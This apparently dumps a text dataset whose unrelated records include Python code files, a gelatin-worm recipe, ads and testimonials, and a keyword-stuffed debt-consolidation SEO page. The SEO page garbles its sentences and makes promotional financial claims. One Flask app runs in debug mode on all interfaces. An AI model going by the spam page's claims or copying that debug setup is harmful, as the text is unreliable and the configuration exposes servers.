text
stringlengths 29
850k
|
|---|
from ..helpers import ResourceBase, FilteredIterableResource
from ..errors import ok_or_error, response_or_error
from ..compat import update_doc
class Groups(ResourceBase, FilteredIterableResource):
@response_or_error
def add(self, group):
"""
Add a group, returns a dictionary containing the group name
"""
return self._client.post(self.url(), {}, params=dict(name=group))
@ok_or_error
def delete(self, group):
"""
Delete a group.
"""
return self._client.delete(self.url(), params=dict(name=group))
@ok_or_error
def add_user(self, group, user):
"""
Add a user to a group.
"""
return self._client.post(self.url("/add-user"), dict(context=group, itemName=user))
@ok_or_error
def remove_user(self, group, user):
"""
Remove a user to a group.
"""
return self._client.post(self.url("/remove-user"), dict(context=group, itemName=user))
def more_members(self, group, filter=None):
"""
Retrieves a list of users that are members of a specified group.
filter: return only users with usernames, display names or email addresses containing this string
"""
params = dict(context=group)
if filter:
params['filter'] = filter
return self.paginate("/more-members", params)
def more_non_members(self, group, filter=None):
"""
Retrieves a list of users that are not members of a specified group.
filter: return only users with usernames, display names or email addresses containing this string
"""
params = dict(context=group)
if filter:
params['filter'] = filter
return self.paginate("/more-non-members", params)
update_doc(Groups.all, """
Returns an iterator that will walk all the groups, paginating as necessary.
filter: if specified only group names containing the supplied string will be returned
""")
|
Prepare an 8- x 8-inch pan by wetting it lightly with water.
Place 4 tablespoons gelatin in 1/4 cup cold water to soften for about 5 minutes.
Place the raspberry juice, 6 tablespoons sugar, and 4 tablespoons corn syrup in a medium saucepan over medium heat and stir until sugar dissolves.
Stir in the gelatin and continue stirring until gelatin dissolves.
At this point add food coloring, if you're using it.
Pour into prepared pan and refrigerate for 1 hour, until set.
Repeat procedure with orange juice: place 4 tablespoons gelatin in 1/4 cup cold water to soften for about 5 minutes.
Place the orange juice, 6 tablespoons sugar, and 4 tablespoons corn syrup in a medium saucepan over medium heat and stir until sugar dissolves.
At this point, add food coloring, if using.
Remove from heat and allow to cool for 10 minutes in pan.
Pour over raspberry layer and refrigerate for 1 hour, until set.
When set, turn out of the pan and cut with a sharp knife into long, thin strips to resemble worms.
Enjoy in pudding dirt cups or by themselves.
Raspberry juice can be obtained from boiling fresh or frozen raspberries over medium heat. Place 1 /2 cups of berries in a small saucepan and heat, stirring occasionally, until they are very liquidy. Pour through a strainer, reserving juice, and press fruit against the strainer to squeeze out all the juice.
|
from flask import Flask, render_template
import datetime
from os import listdir
from os.path import isfile, join
import twitter as tw
import image_overlay as ilay
import band_name as bn
app = Flask(__name__)
app.debug = True
names_made=0
page_info = {}
page_info['business_name'] = u"Band Name Generator"
page_info['desciption'] = u"Get your band name generated here."
page_info['about'] = u"We make the band name for real."
page_info['phone'] = u"(900) 985-2781"
page_info['phone_link'] = u"+1"
page_info['address'] = u"Saint Joseph, MO"
page_info['email'] = u"jaredhaer@gmail.com"
page_info['facebook'] = u"https://www.facebook.com/jared.haer"
page_info['twitter'] = u"https://twitter.com/jared216"
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
page_info["moment"]=str(datetime.datetime.now())
@app.route("/")
def index():
page_info["moment"]=str(datetime.datetime.now())
return render_template("index.html",page_info=page_info)
@app.route("/band_name")
def bandName():
global names_made
page_info['band_name']=bn.getName()
bname=page_info['band_name']
p="./static/"
fn_out='images/band_names/'+str(names_made%12+1)+'.png'
print(ilay.makeImage(bname,fn_in='./bg.png',fn_out=p+fn_out))
page_info['band_image']=fn_out
names_made+=1
datetime.datetime.now()
# page_info['tweet_status']=tw.tweetImage(bn.getTweet(bname),ilay.makeImage(bname))
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
return render_template("band_name.html", page_info=page_info)
if __name__ == "__main__":
app.run(host="0.0.0.0",port=5004)
|
This property is just outside the city in a beautiful area just a short 1/2 mile drive to the city limits of Inverness. The Inverness area is a growing community and a quality location for families and residential development. Nearby you will find abundant amenities, such as retail, restaurants, schools, and jobs. The immediate area is primarily rural residential. The property shares borders with the Withlacoochee State Forest/Citrus Wildlife Management area to the west and south that provide privacy for the parcel and future development community.
|
#python
# Random scale & rotation tool
# Supports transforming individual mesh items from selection, or each polygon island within the mesh items
# Author: Jose Lopez Romo - Zhibade
import modo
import lx
import random
def query_user_value(user_value):
"""
Utility function for querying user values
"""
return lx.eval("user.value {0} ?".format(user_value))
SCALE_LIMITS_X = [query_user_value('zbRandScaleRot_scaleMinX'), query_user_value('zbRandScaleRot_scaleMaxX')]
SCALE_LIMITS_Y = [query_user_value('zbRandScaleRot_scaleMinY'), query_user_value('zbRandScaleRot_scaleMaxY')]
SCALE_LIMITS_Z = [query_user_value('zbRandScaleRot_scaleMinZ'), query_user_value('zbRandScaleRot_scaleMaxZ')]
SCALE_LIMITS_U = [query_user_value('zbRandScaleRot_scaleMinU'), query_user_value('zbRandScaleRot_scaleMaxU')]
ROT_LIMITS_X = [query_user_value('zbRandScaleRot_rotMinX'), query_user_value('zbRandScaleRot_rotMaxX')]
ROT_LIMITS_Y = [query_user_value('zbRandScaleRot_rotMinY'), query_user_value('zbRandScaleRot_rotMaxY')]
ROT_LIMITS_Z = [query_user_value('zbRandScaleRot_rotMinZ'), query_user_value('zbRandScaleRot_rotMaxZ')]
TRANSLATE_LIMITS_X = [query_user_value('zbRandScaleRot_translateMinX'), query_user_value('zbRandScaleRot_translateMaxX')]
TRANSLATE_LIMITS_Y = [query_user_value('zbRandScaleRot_translateMinY'), query_user_value('zbRandScaleRot_translateMaxY')]
TRANSLATE_LIMITS_Z = [query_user_value('zbRandScaleRot_translateMinZ'), query_user_value('zbRandScaleRot_translateMaxZ')]
APPLY_SCALE = query_user_value('zbRandScaleRot_scale')
APPLY_ROTATION = query_user_value('zbRandScaleRot_rotate')
APPLY_TRANSLATE = query_user_value('zbRandScaleRot_translate')
UNIFORM_SCALE = query_user_value('zbRandScaleRot_uniformScale')
POLYGON_ISLANDS = query_user_value('zbRandScaleRot_polyIslands')
PIVOT_POSITION = query_user_value('zbRandScaleRot_pivotPosition')
VALID_PIVOT_POSITIONS = ['Center', 'Top', 'Bottom', 'Left', 'Right', 'Front', 'Back']
def selection_check(selected_items):
"""
Checks current selection and stops the script if no mesh item is selected
"""
if not selected_items:
lx.eval("dialog.setup warning")
lx.eval("dialog.title Warning")
lx.eval("dialog.msg {No mesh items selected}")
lx.eval('dialog.result ok')
lx.eval('dialog.open')
sys.exit()
def pivot_check():
"""
Checks pivot position value and stops the script if it isn't valid
"""
if PIVOT_POSITION not in VALID_PIVOT_POSITIONS:
lx.eval("dialog.setup warning")
lx.eval("dialog.title Warning")
lx.eval("dialog.msg {Invalid pivot position}")
lx.eval('dialog.result ok')
lx.eval('dialog.open')
sys.exit()
def random_transform():
"""
Transforms current selection randomnly as defined by scale and rotation limits in user values
"""
if APPLY_SCALE:
if UNIFORM_SCALE:
scale_u = random.uniform(SCALE_LIMITS_U[0], SCALE_LIMITS_U[1])
lx.eval("transform.channel scl.X {0}".format(scale_u))
lx.eval("transform.channel scl.Y {0}".format(scale_u))
lx.eval("transform.channel scl.Z {0}".format(scale_u))
else:
scale_x = random.uniform(SCALE_LIMITS_X[0], SCALE_LIMITS_X[1])
scale_y = random.uniform(SCALE_LIMITS_Y[0], SCALE_LIMITS_Y[1])
scale_z = random.uniform(SCALE_LIMITS_Z[0], SCALE_LIMITS_Z[1])
lx.eval("transform.channel scl.X {0}".format(scale_x))
lx.eval("transform.channel scl.Y {0}".format(scale_y))
lx.eval("transform.channel scl.Z {0}".format(scale_z))
if APPLY_ROTATION:
rot_x = random.uniform(ROT_LIMITS_X[0], ROT_LIMITS_X[1])
rot_y = random.uniform(ROT_LIMITS_Y[0], ROT_LIMITS_Y[1])
rot_z = random.uniform(ROT_LIMITS_Z[0], ROT_LIMITS_Z[1])
lx.eval("transform.channel rot.X {0}".format(rot_x))
lx.eval("transform.channel rot.Y {0}".format(rot_y))
lx.eval("transform.channel rot.Z {0}".format(rot_z))
if APPLY_TRANSLATE:
translate_x = random.uniform(TRANSLATE_LIMITS_X[0], TRANSLATE_LIMITS_X[1])
translate_y = random.uniform(TRANSLATE_LIMITS_Y[0], TRANSLATE_LIMITS_Y[1])
translate_z = random.uniform(TRANSLATE_LIMITS_Z[0], TRANSLATE_LIMITS_Z[1])
lx.eval("transform.channel pos.X {0}".format(translate_x))
lx.eval("transform.channel pos.Y {0}".format(translate_y))
lx.eval("transform.channel pos.Z {0}".format(translate_z))
def transform_polygon_islands():
"""
Takes all polygon islands inside the selected mesh items and transforms them randomly.
The pivot of the transformation depends on the user value set in the UI
"""
scene = modo.Scene()
mesh_items = scene.selectedByType('mesh')
selection_check(mesh_items)
for item in mesh_items:
scene.select(item)
geometry = item.geometry
# This mesh will be used to store polygon islands temporalily
final_mesh = scene.addMesh("zbFinalScaledMeshes")
all_polys = list(geometry.polygons)
# Scale all polygon islands and store them in the temporary mesh
while all_polys:
all_polys[0].select(True)
lx.eval("select.polygonConnect m3d false")
lx.eval("select.cut")
temp_mesh = scene.addMesh("zbTempScaleMesh")
scene.select(temp_mesh)
lx.eval("select.paste")
lx.eval("select.type item")
lx.eval("center.bbox {0}".format(PIVOT_POSITION.lower()))
random_transform()
lx.eval("select.cut")
scene.select(final_mesh)
lx.eval("select.paste")
scene.removeItems(temp_mesh)
scene.select(item)
all_polys = list(geometry.polygons)
# Cut all polygon islands back to the original mesh and clean scene
scene.select(final_mesh)
lx.eval("select.all")
lx.eval("select.cut")
scene.select(item)
lx.eval("select.paste")
scene.removeItems(final_mesh)
def transform_mesh_items():
"""
Takes all the selected mesh items and transforms them randomnly.
"""
scene = modo.Scene()
mesh_items = scene.selectedByType('mesh')
selection_check(mesh_items)
for item in mesh_items:
scene.select(item)
random_transform()
if POLYGON_ISLANDS:
pivot_check()
transform_polygon_islands()
else:
transform_mesh_items()
|
If a print ad pops out at you from a page, unfolds magically before your eyes, lights up, sings a song or emits a scent, chances are it was created by Structural Graphics. Structural Graphics is the nation’s leading resource for high-impact print marketing solutions. With over 30 years of experience, they create and produce highly interactive direct mail, collateral, magazine inserts, P.O.P. displays, sales aids and promotional packaging pieces.
Structural Graphics has been using Crystal Clear Bags™ for many years to increase the “pop” and response rate for direct mail campaigns. The Structural Graphics Vice-President of Marketing recently shared his experiences with ClearBags™.
Paper Zone is a retail store filled with fun, interesting, unique paper products and accessories with a selection that you simply can't find anywhere else. It is a discovery zone where customers can come to find exactly what they need, discover things that they didn't know existed, and leave feeling that they've found a new favorite place to shop. With over 440 different types of paper, 175 crafting tools, 130 types of adhesive and 75 styles of boxes for packing and shipping, Paper Zone will help you find everything you need for your card-making, crafting or business needs.
Paper Zone has been using Crystal Clear Bags™ for many years to promote and protect their products. Recently they shared their experiences with ClearBags™.
"At Paper Zone, we find a lot of uses for Crystal Clear Bags. We are constantly sending out sample boards to our stores to display as customer inspiration to make cards, invites and paper craft ideas. The only solution to protect these samples and keep them intact for customers to see for years to come is Crystal Clear Bags. These bags allow us to beautifully showcase our samples while keeping them untouched and viewable through the Crystal Clear packaging."
"Our customers love to use ClearBags™ as a way to showcase their handmade cards, stationery and art. At ClearBags we can always find the perfect bag for every project."
Paper Zone uses a number of Crystal Clear Bags in various sizes including the 5x7" B7B1 to help promote and protect their products. In addition, Paper Zone, enjoys the great presentation that Crystal Clear Boxes™ provide for cards such as the 5x7" FB4.
Whether you are a large retail chain, or a sole proprietor, ClearBags has the packaging that will help you promote, protect, and preserve your greatest endeavors.
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from ....extern.six.moves import cStringIO as StringIO
from ... import ascii
from .common import (assert_equal, assert_almost_equal,
setup_function, teardown_function)
def assert_equal_splitlines(arg1, arg2):
assert_equal(arg1.splitlines(), arg2.splitlines())
def test_read_normal():
"""Normal SimpleRST Table"""
table = """
# comment (with blank line above)
======= =========
Col1 Col2
======= =========
1.2 "hello"
2.4 's worlds
======= =========
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ['Col1', 'Col2'])
assert_almost_equal(dat[1][0], 2.4)
assert_equal(dat[0][1], '"hello"')
assert_equal(dat[1][1], "'s worlds")
def test_read_normal_names():
"""Normal SimpleRST Table with provided column names"""
table = """
# comment (with blank line above)
======= =========
Col1 Col2
======= =========
1.2 "hello"
2.4 's worlds
======= =========
"""
reader = ascii.get_reader(Reader=ascii.RST,
names=('name1', 'name2'))
dat = reader.read(table)
assert_equal(dat.colnames, ['name1', 'name2'])
assert_almost_equal(dat[1][0], 2.4)
def test_read_normal_names_include():
"""Normal SimpleRST Table with provided column names"""
table = """
# comment (with blank line above)
======= ========== ======
Col1 Col2 Col3
======= ========== ======
1.2 "hello" 3
2.4 's worlds 7
======= ========== ======
"""
reader = ascii.get_reader(Reader=ascii.RST,
names=('name1', 'name2', 'name3'),
include_names=('name1', 'name3'))
dat = reader.read(table)
assert_equal(dat.colnames, ['name1', 'name3'])
assert_almost_equal(dat[1][0], 2.4)
assert_equal(dat[0][1], 3)
def test_read_normal_exclude():
"""Nice, typical SimpleRST table with col name excluded"""
table = """
======= ==========
Col1 Col2
======= ==========
1.2 "hello"
2.4 's worlds
======= ==========
"""
reader = ascii.get_reader(Reader=ascii.RST,
exclude_names=('Col1',))
dat = reader.read(table)
assert_equal(dat.colnames, ['Col2'])
assert_equal(dat[1][0], "'s worlds")
def test_read_unbounded_right_column():
"""The right hand column should be allowed to overflow"""
table = """
# comment (with blank line above)
===== ===== ====
Col1 Col2 Col3
===== ===== ====
1.2 2 Hello
2.4 4 Worlds
===== ===== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat[0][2], "Hello")
assert_equal(dat[1][2], "Worlds")
def test_read_unbounded_right_column_header():
"""The right hand column should be allowed to overflow"""
table = """
# comment (with blank line above)
===== ===== ====
Col1 Col2 Col3Long
===== ===== ====
1.2 2 Hello
2.4 4 Worlds
===== ===== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames[-1], "Col3Long")
def test_read_right_indented_table():
"""We should be able to read right indented tables correctly"""
table = """
# comment (with blank line above)
==== ==== ====
Col1 Col2 Col3
==== ==== ====
3 3.4 foo
1 4.5 bar
==== ==== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
assert_equal(dat[0][2], "foo")
assert_equal(dat[1][0], 1)
def test_trailing_spaces_in_row_definition():
""" Trailing spaces in the row definition column shouldn't matter"""
table = """
# comment (with blank line above)
==== ==== ====
Col1 Col2 Col3
==== ==== ====
3 3.4 foo
1 4.5 bar
==== ==== ====
""" # noqa
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
assert_equal(dat[0][2], "foo")
assert_equal(dat[1][0], 1)
table = """\
====== =========== ============ ===========
Col1 Col2 Col3 Col4
====== =========== ============ ===========
1.2 "hello" 1 a
2.4 's worlds 2 2
====== =========== ============ ===========
"""
dat = ascii.read(table, Reader=ascii.RST)
def test_write_normal():
"""Write a table as a normal SimpleRST Table"""
out = StringIO()
ascii.write(dat, out, Writer=ascii.RST)
assert_equal_splitlines(out.getvalue(), """\
==== ========= ==== ====
Col1 Col2 Col3 Col4
==== ========= ==== ====
1.2 "hello" 1 a
2.4 's worlds 2 2
==== ========= ==== ====
""")
|
This is an extension of the Arnett Canyon Trail and links into the Telegraph Canyon Trail.
no reports have been added for Arnett Canyon Spur yet, add a trail report.
no videos have been added for Arnett Canyon Spur yet, add a video.
|
from collections import OrderedDict
from levenshteinDistance import levenshtein as ld
#------------------------
# shared variables:
#------------------------
words = OrderedDict()
words['Eng'] = ''
words['Ger'] = ''
words['Por'] = ''
words['Pol'] = ''
outputFilename = 'output.txt'
allophones = {
'aeiou' : 'a',
'bp' : 'b',
'cjsz' : 'z',
'dt' : 'd',
'fv' : 'v',
'gkq' : 'g',
'hx' : 'h',
'lr' : 'l',
'mn' : 'm',
'w' : 'w',
'y' : 'y'
}
#------------------------
# functions:
#------------------------
def respellWithInitialVowelAndConsonants(word):
for char in word[1:]:
if char in 'aeiou':
word = word[0] + word[1:].replace(char,'')
return word
def respellWithAllophones(word):
for char in word:
for allo in allophones:
if char in allo:
word = word.replace(char,allophones[allo])
return word
def combineOverlappingWords(shortList):
for language in shortList:
for otherlanguage in shortList:
if language != otherlanguage and language != 'Eng' and otherlanguage != 'Eng':
a = shortList[language]
b = shortList[otherlanguage]
for i in range(1, len(b)):
if a.endswith(b[:i]):
shortList[otherlanguage] = ''
shortList[language] = a+b[i:]
return shortList
def evaluateScore_Levenshtein(word,originalWords):
score = 0
score_maximize = 100 # just to keep score positive
score_minimize = 0
for lang in originalWords:
score_minimize += ld(word,lang)
score = score_maximize - score_minimize
return score
def evaluateScore_AlloWithVowels(word,originalWords):
score = 0
scoreLangs = [0] * len(originalWords)
leastEfficientWord = ''.join(originalWords)
# ABZDAVG allo w/ vowels
alloWithVowels = respellWithAllophones(word)
#print 'Allophone Form of Word, with Vowels: ', alloWithVowels
alloOriginalWords = list(originalWords) # careful with creating references that overwrite!
for index, srcWord in enumerate(alloOriginalWords):
alloOriginalWords[index] = respellWithAllophones(srcWord)
#print alloOriginalWords
# get preliminary scores for each language:
for lang, srcWordAllo in enumerate(alloOriginalWords):
for i in range(len(srcWordAllo)):
head = srcWordAllo[:i]
if head in respellWithAllophones(word):
# add to score per matching letter of word:
scoreLangs[lang] += 1
# adjust language scores by number of characters in original words:
for lang, srcWordAllo in enumerate(alloOriginalWords):
scoreLangs[lang] -= len(srcWordAllo)
# language scores are weighted in reverse order
scoreLangs.reverse()
for wt, lang in enumerate(scoreLangs):
score += lang + lang * ((wt+1)/10.0) # make weightings like these to make gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
#print 'language score contribution: ', score
# get preliminary score for word length:
scoreLen = (len(leastEfficientWord) - len(word)) # score increases with shorter word
scoreLen *= 1.1 # this is the weighting for length score
#print 'word length contribution', scoreLen
score += scoreLen
return round(score,2)
def evaluateScore_ConsonantsInOrder(word,originalWords):
score = 0
scoreLangs = [0] * len(originalWords)
leastEfficientWord = ''.join(originalWords)
alloConsonants = list(originalWords) # careful with creating references that overwrite!
alloOfNewWord = respellWithAllophones(word).replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')
#print alloOfNewWord
for index, srcWord in enumerate(alloConsonants):
alloConsonants[index] = respellWithAllophones(srcWord).replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')
#print alloConsonants
# BZDVG
# go through each language's test pattern:
for lang, testPattern in enumerate(alloConsonants):
currentLetterPos = 0
# go through as many letters of that test pattern as possible:
for i in range(1,len(testPattern)):
# if that letter is found in new word then update current letter position (= index+1 since list indices start at 0):
if testPattern[i] in alloOfNewWord:
#print testPattern[i]
currentLetterPos = i+1
# use full word length - the current letter into the test pattern as the score for that language
scoreLangs[lang] = currentLetterPos - len(originalWords[lang])
currentLetterPos = 0
#print scoreLangs
# language scores are weighted in reverse order
scoreLangs.reverse()
for wt, lang in enumerate(scoreLangs):
score += lang + lang * ((wt+1)/10.0) # make weightings like these to make gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
# get preliminary score for word length:
scoreLen = (len(leastEfficientWord) - len(word)) # score increases with shorter word
scoreLen *= 1.1 # this is the weighting for length score
#print 'word length contribution', scoreLen
score += scoreLen
return round(score,2)
def evaluateScore_LettersFromEachSource(word,originalWords):
score = 0
for letter in word:
for srcWord in originalWords:
# encourage using words with letters found in all source words
score += 1 if letter in srcWord else 0
return score
def penalizeRepeatedLetterSequences(word):
score = 0
currentLetter = ''
for letter in word:
if letter == currentLetter:
score -= 1
else:
currentLetter = letter
return score
def penalizeLength(word):
score = -len(word)
return score
def penalizeZeroLetters(word):
if word == '':
return -1
return 0
def penalizeNoVowels(word):
score = 0
vowels = 'aeiou'
has = False
for vowel in vowels:
if vowel in word:
score = 1
return score
if len(word) > 1: # don't force a vowel if the word is only 1-letter long
score = -1
return score
def penalizeInstructionComplexity(instruction): # TODO
score = 0
return score
def evaluate(line):
newWord = line.split(',')[0]
originalWords = line.split(',')[2:]
score = 0
score += evaluateScore_AlloWithVowels(newWord, originalWords)
score += evaluateScore_ConsonantsInOrder(newWord, originalWords)
score -= evaluateScore_Levenshtein(newWord, originalWords)
score += evaluateScore_LettersFromEachSource(newWord, originalWords)
score += penalizeRepeatedLetterSequences(newWord)
score += penalizeLength(newWord)
score += penalizeZeroLetters(newWord)
score += penalizeNoVowels(newWord)
# score += penalizeInstructionComplexity(instruction) # TODO
return round(score, 2)
#------------------------
# main part of the program:
#------------------------
# get lines of file into a list:
with open(outputFilename,'r') as f1:
data = f1.readlines()
# fill arrays:
for line in data:
if ',' in line:
print(evaluate(line))
|
Debt consolidation Marietta works, try it today. Debt is not a new phenomenon. Problems with debts have been here for as long as humanity itself. However, how we manage our debts has evolved over the years in Marietta Pennsylvania. For example, people no longer have to slave for feudal lords in Marietta just because they could not pay up their credit cards. Nowadays, creditors are civil about how they collect their debts.
You will never in Marietta have to deal with bankruptcy lawyers and/or courts in Marietta if you learn how to manage your credit cards well. This is especially true in the modern economy in Marietta that we live in. Now, you can actually consolidate your debt with credit consolidating programs instead of having many creditors. debt consolidation Marietta comes with many numerous credit card debt settlement benefits.
Negotiating with your creditors in Marietta can be a very frustrating experience. They rarely listen in Marietta, in fact, they usually ask for unanticipated higher interest rates when you ask in Marietta for a longer repayment period on your online cash advance lending. Conversely, they will ask for a shorter debt consolidation repayment period on your cash fast loans if you ask for a lower interest rate. This debt consolidation dispute will go on and on just because you are just an individual living in Marietta PA trying to make ends meet.
However, the presence of a credit management company changes everything. You will now able to negotiate better terms with your debt consolidation creditors if you decide to consolidate your credit cards. This is because the presence of a credit management service assures your creditors that they will receive their fast loan payments in due time. This makes the debt consolidation creditors more flexible as you negotiate credit consolidating terms with them.
Free help for your Marietta debts.
Lower your monthly consolidation payments and get out of debt fast. Our debt consolidation services and credit consolidating professionals can help you get debt free fast. Simply use the form on the right to contact an expert credit consolidating agent who can help you gain commercial control over all of your credit card debt or loan problems today! Anyone from can use our debt management services, free debt consolidation services from DebtCafe USA.
If you are like individuals residing in Marietta PA, you are starting to feel the pinch from the market collapse in Marietta and you want to know how you can save on interest charges with debt consolidation in Marietta and get out of debts. You may have tried to obtain credit counseling products the local consolidation lending institutions in Marietta PA but the banks consolidation just aren't willing to assist and monetary companies want way too much in interest in Marietta and other up front fee's. At DebtCafe we have the perfect credit card debt consolidating solution. Your debt consolidation creditors realize the value in Marietta of obtaining their money back in Marietta so they're willing to assist us by decreasing in Marietta, or even removing, late fees and additional interest costs in Marietta when you use one of our credit management services.
Our credit card settlement experts will explain to you how debt consolidation can help you minimize or eliminate credit card debts charges, and simplify your debt relief repayment with just a single debt management payment each month. If you are from and you need to set up your free debt counseling analysis, simply complete the FREE debt consolidation form above.
Once the free debt management form above has been completed in Marietta PA, you gain access to your very own network of credit card debt and debt settlement specialists who will run a simple but effective commercial assessment of your personal bills situation. This will be used to figure out the very best debt counselling options that works for you. It is vitally important in Marietta for all involved to completely understand where you are at with your bills situation because without these particulars, the counselors in Marietta can not offer a correct evaluation and determine what is the best customized Marietta PA debt consolidation program that gets you out of your encounter while putting extra cash in your pocket with debt consolidation at the same time. By finishing this free debt consultation, the credit card negotiation team will be able to assist you save thousands in Marietta in interest and possibly principal amounts as well in Marietta PA.
|
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of REDHAWK rest-python.
#
# REDHAWK rest-python is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# REDHAWK rest-python is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
"""
redhawk.py
Asynchronous Tornado service for REDHAWK. Maps the functions
in domain.py and caches the domain object.
"""
from _utils.tasking import background_task
from domain import Domain, scan_domains, ResourceNotFound
class Redhawk(object):
__domains = {}
def _get_domain(self, domain_name):
name = str(domain_name)
if not name in self.__domains:
self.__domains[name] = Domain(domain_name)
return self.__domains[name]
##############################
# DOMAIN
@background_task
def get_domain_list(self):
return scan_domains()
@background_task
def get_domain_info(self, domain_name):
dom = self._get_domain(domain_name)
return dom.get_domain_info()
@background_task
def get_domain_properties(self, domain_name):
dom = self._get_domain(domain_name)
return dom.properties()
##############################
# APPLICATION
@background_task
def get_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.find_app(app_id)
@background_task
def get_application_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.apps()
@background_task
def get_available_applications(self, domain_name):
dom = self._get_domain(domain_name)
return dom.available_apps()
@background_task
def launch_application(self, domain_name, app_name):
dom = self._get_domain(domain_name)
return dom.launch(app_name)
@background_task
def release_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.release(app_id)
##############################
# COMPONENT
@background_task
def get_component(self, domain_name, app_id, comp_id):
dom = self._get_domain(domain_name)
return dom.find_component(app_id, comp_id)
@background_task
def get_component_list(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.components(app_id)
@background_task
def component_configure(self, domain_name, app_id, comp_id, new_properties):
dom = self._get_domain(domain_name)
comp = dom.find_component(app_id, comp_id)
configure_changes = {}
for prop in comp._properties:
if prop.id in new_properties:
if new_properties[prop.id] != prop.queryValue():
configure_changes[prop.id] = (type(prop.queryValue()))(new_properties[prop.id])
return comp.configure(configure_changes)
##############################
# DEVICE MANAGER
@background_task
def get_device_manager(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.find_device_manager(device_manager_id)
@background_task
def get_device_manager_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.device_managers()
##############################
# DEVICE
@background_task
def get_device_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.devices(device_manager_id)
@background_task
def get_device(self, domain_name, device_manager_id, device_id):
dom = self._get_domain(domain_name)
return dom.find_device(device_manager_id, device_id)
##############################
# SERVICE
@background_task
def get_service_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.services(device_manager_id)
##############################
# GENERIC
@background_task
def get_object_by_path(self, path, path_type):
'''
Locates a redhawk object with the given path, and path type.
Returns the object + remaining path:
comp, opath = locate(ipath, 'component')
Valid path types are:
'application' - [ domain id, application-id ]
'component' - [ domain id, application-id, component-id ]
'device-mgr' - [ domain id, device-manager-id ]
'device' - [ domain id, device-manager-id, device-id ]
'''
domain = self._get_domain(path[0])
if path_type == 'application':
return domain.find_app(path[1]), path[2:]
elif path_type == 'component':
return domain.find_component(path[1], path[2]), path[3:]
elif path_type == 'device-mgr':
return domain.find_device_manager(path[1]), path[2:]
elif path_type == 'device':
return domain.find_device(path[1], path[2]), path[3:]
raise ValueError("Bad path type %s. Must be one of application, component, device-mgr or device" % path_type)
|
Elite Printing, Inc. is a Certified Women Owned Business. Family owned and operated since 1986. Our outstanding customer service helps us to excel in establishing an easy ordering process. We have two locations to better serve Indianapolis and the surrounding areas.
We encourage you to take advantage of our skilled marketing and design team. Elite Printing offers innovative solutions to developing your business. Our marketing and design consultants can help set your company up with an effective marketing plan, custom graphic design, fast turnaround with exceptional quality. We can also provide suggestions for green and environmentally friendly printing. Let us help you grow your business.
Elite Printing is centrally located in SoBro to better serve Downtown and the Northside of Greater Indianapolis. Hobby Copy is conveniently located in the University of Indianapolis neighborhood. The addition of Hobby Copy has allowed our company to better serve both the north and south sides of Indianapolis.
Hobby Copy is known for it’s specialization in high speed copies and quick turn around. In association with Elite Printing our goal is to provide our customers with expanded services from both locations. We offer pick up and delivery from either location giving you the experience of one stop shopping.
|
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.shortcuts import render, redirect
from datetime import datetime
from main import models as mdl
from dateutil.relativedelta import relativedelta
def new(request, location_id):
location = mdl.contrat_location.find_by_id(location_id)
# Trouver le dernier financement
financement_list = mdl.financement_location.find_by_location(location_id).order_by('date_debut')
financement_dernier = financement_list.last()
nouveau_financement = None
financement = None
if financement_list:
financement = financement_list[0]
# le dupliquer
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = financement_dernier.date_debut
nouveau_financement.date_fin = financement_dernier.date_fin
nouveau_financement.loyer = financement_dernier.loyer
nouveau_financement.charges = financement_dernier.charges
nouveau_financement.index = financement_dernier.index
return render(request, "financementlocation_new.html",
{'old_financement': financement,
'nouveau_financement': nouveau_financement,
'id_location': location.id,
'prev': request.GET.get('prev', None),
'previous': 'location'})
def create(request):
location = mdl.contrat_location.find_by_id(request.POST['id'])
if request.POST.get('cancel_financement_loc_new', None):
previous = request.POST.get('previous', None)
if previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
else:
prev = request.POST.get('prev', None)
# todo : récupérer le nouveau financement, adapter l'ancien et sauver le tout en bd
# adaptation du financement courant
